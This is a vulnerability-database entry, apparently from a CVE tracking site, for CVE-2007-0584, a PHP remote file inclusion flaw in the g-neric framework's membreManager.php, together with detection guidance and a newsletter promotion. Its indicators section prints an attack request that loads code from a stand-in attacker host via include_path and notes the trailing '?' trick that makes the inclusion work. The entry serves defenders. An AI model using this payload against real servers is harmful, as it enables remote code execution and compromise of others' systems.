cbcvebase.
CVE-2007-0584
published 2007-01-30

CVE-2007-0584: PHP remote file inclusion vulnerability in membres/membreManager.php in PhP Generic Library & Framework for comm (g-neric) allows remote attackers to execute…

PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
69.95%
99.3th percentile
PHP remote file inclusion vulnerability in membres/membreManager.php in PhP Generic Library & Framework for comm (g-neric) allows remote attackers to execute arbitrary PHP code via a URL in the include_path parameter.

Detection & IOCsextracted from sources · hover to see the quote

pathmembres/membreManager.php
commandmembres/membreManager.php?include_path=http://evilscripts?
  • Detect HTTP requests targeting membreManager.php with a URL-based value in the include_path parameter, indicating remote file inclusion attempt.
  • Monitor for use of $GLOBALS[include_path] being set to a remote URL, which triggers inclusion of attacker-controlled PHP files (configmember.php, inc-membreManager.php).
  • ·The RFI payload URL must be terminated with a '?' character to nullify the appended filename suffix (e.g., configmember.php), allowing the attacker's script to load cleanly.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.